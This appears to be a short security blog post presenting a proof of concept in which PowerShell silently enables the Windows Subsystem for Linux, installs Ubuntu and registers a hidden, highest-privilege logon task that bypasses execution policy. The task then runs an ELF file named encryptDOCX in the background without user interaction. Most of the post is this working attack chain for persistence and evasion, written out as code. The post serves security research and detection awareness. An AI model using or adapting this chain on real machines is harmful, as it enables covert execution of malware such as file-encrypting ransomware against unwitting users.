WSL enables native Linux ELF64 binaries to run on Windows through the Windows Subsystem for Linux (WSL).
From an attacker’s perspective, WSL is promising. Since 1809, it has been possible to install WSL distros directly from the command line.
This means that an attacker can enable WSL, install a Linux distro, and execute malicious ELF files in the background without any user interaction.
P.S. The C: drive is mounted on /mnt/c.
Self-Documented Proof of Concept (POC)
The first PowerShell script (start.ps1) enables WSL and downloads the Ubuntu1804 package. It also registers a task to execute the second script (resume.ps1), which installs the Ubuntu distro and executes the ELF file (encryptDOCX). All of this occurs in the background without user interaction.
# Enable Microsoft Windows Subsystem Linux Feature (without restart)Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux -NoRestart | Out-Null
# Download Ubuntu distroInvoke-WebRequest -Uri https://aka.ms/wsl-ubuntu-1804 -OutFile ~/Ubuntu.appx -UseBasicParsing
# Add-Appx-Package: Adds a signed app package to a user accountAdd-AppxPackage -Path ~/Ubuntu.appx
# Register Scheduled Task$scriptPath = (Get-Location).Path + "\" + "resume.ps1"$resumeActionscript = "-executionpolicy bypass -WindowStyle Hidden -NoLogo -NoProfile -File $scriptPath"
Get-ScheduledTask -TaskName ResumeWSLTask –EA SilentlyContinue | Unregister-ScheduledTask -Confirm:$false
$powershellPath = (get-command powershell).Source$act = New-ScheduledTaskAction -Execute $powershellPath -Argument $resumeActionscript
$trig = New-ScheduledTaskTrigger -AtLogOn -RandomDelay 00:00:55
Register-ScheduledTask -TaskName ResumeWSLTask -Action $act -Trigger $trig -RunLevel Highest# install UbuntuUbuntu1804 install --root
# execute "malicious" executablebash -c "exec /mnt/c/.../.../encryptDOCX"I believe it is significantly more challenging to detect and analyze malicious ELF executables on Windows.
